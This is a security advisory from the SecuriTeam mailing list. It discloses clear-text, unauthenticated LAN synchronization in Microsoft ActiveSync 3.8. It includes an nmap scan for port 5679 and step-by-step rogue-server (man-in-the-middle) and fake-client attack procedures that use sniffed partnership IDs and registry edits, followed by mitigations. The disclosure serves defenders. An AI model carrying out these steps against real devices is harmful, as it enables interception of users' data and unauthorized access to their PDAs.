[NT] Microsoft ActiveSync Clear Text Password

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Microsoft ActiveSync Clear Text Password
------------------------------------------------------------------------


SUMMARY

 <http://www.microsoft.com/windowsmobile/downloads/activesync37.mspx> 
Microsoft ActiveSync is "widely used to synchronizes Windows based PDAs 
and smartphones with desktop computer. PDA can connect to PC via 
COM/USB/IR or LAN. Before synchronization user on PC must setup 
"partnership" to allow synchronization. If PDA is protected with password 
user on PC should provide password before he can access the device".

Synchronization over LAN/Wi-Fi has some design weakness, these include the 
password being sent in clear text.

DETAILS

Vulnerable Systems:
 * ActiveSync version 3.8

1. All data, including initial "authentication", is transmitted in clear 
text. This has no security implication in the case of COM/USB and other 
physical protected communication, however, LAN (Wi-Fi in most cases) is 
very sensitive for sniffing, and such communication could be intercepted

2. Even if the PDA is password protected, ActiveSync doesn't ask password 
in case of network synchronization

3. ActiveSync doesn't use any form of authentication for server (PC) or 
client (PDA), therefore rogue server or fake clients can synchronize with 
the server/client without difficulty

You can discover ActiveSync that have the LAN synchronization by scanning 
for TCP port 5679:
nmap -p 5679 192.168.0.*

Fake server:
It is easy to build rogue server without any special software. All that is 
required is ActiveSync, a sniffer and any MitM condition.

Steps:
1. Install ActiveSync on rogue server. Enable network synchronization
2. Realize a MitM condition
3. Launch you favorite sniffer and set filter to save TCP packets on port 
5679
4. Wait for PDA connection
5. Open sniffer and check second data packet from PDA. At offset 0x14 and 
0x18 you can see partnerships ids. ActiveSync can support up to 2 PC and 
as you can see, PDA send both IDs in the "handshake"
6. Import template in registry. Change key 
HKEY_CURRENT_USER\Software\Microsoft\Windows CE 
Services\Partners\<Partnerhsip> to sniffed partnership id
7. Wait for another connection and check ActiveSync, device should be 
connected as "guest". Even if you got "Synchronization Error", try to 
click "Explore" button on the toolbar

Fake Client:
Is very similar to the rogue server, but you don't need MitM conditions to 
accomplish this attack. All that is need is the name of the PC and 
corresponding "partnership id"

1. Launch your favorite registry editor for Windows Mobile
2. Navigate to HKLM\Software\Microsoft\Windows CE Services\Partners\P1
3. Create string value PName = <PC_NAME>
4. Create DWORD value PId = <partnership id>
5. Launch active sync on PDA and try to connect. If everything is OK, 
synchronization will occur.

Mitigating factors:
1. LAN synchronization is disabled by default
2. To implement a "fake client" you would need to know that Partnership 
ID. It's hard to guess (2^32), but because ActiveSync accept 2 partnership 
ID per connection, actually we need (2^31) connections to brute force the 
string

ActiveSync should use TLS for authentication of PC and PDA and data 
encryption. We don't need PKI in this case, because "direct trust" can be 
created and certificates transmitted from PDA to PC and vise versa when 
"Partnership" is established


ADDITIONAL INFORMATION

The information has been provided by  <mailto:Hataha_@xxxxxxxxxx> Natalia 
Melnikova.
The original article can be found at:  
<http://www.securitylab.ru/56278.html> 
http://www.securitylab.ru/56278.html
The original article can be found at:  
<http://www.security.nnov.ru/Fnews64.html> 
http://www.security.nnov.ru/Fnews64.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@xxxxxxxxxxxxxx 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@xxxxxxxxxxxxxx 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.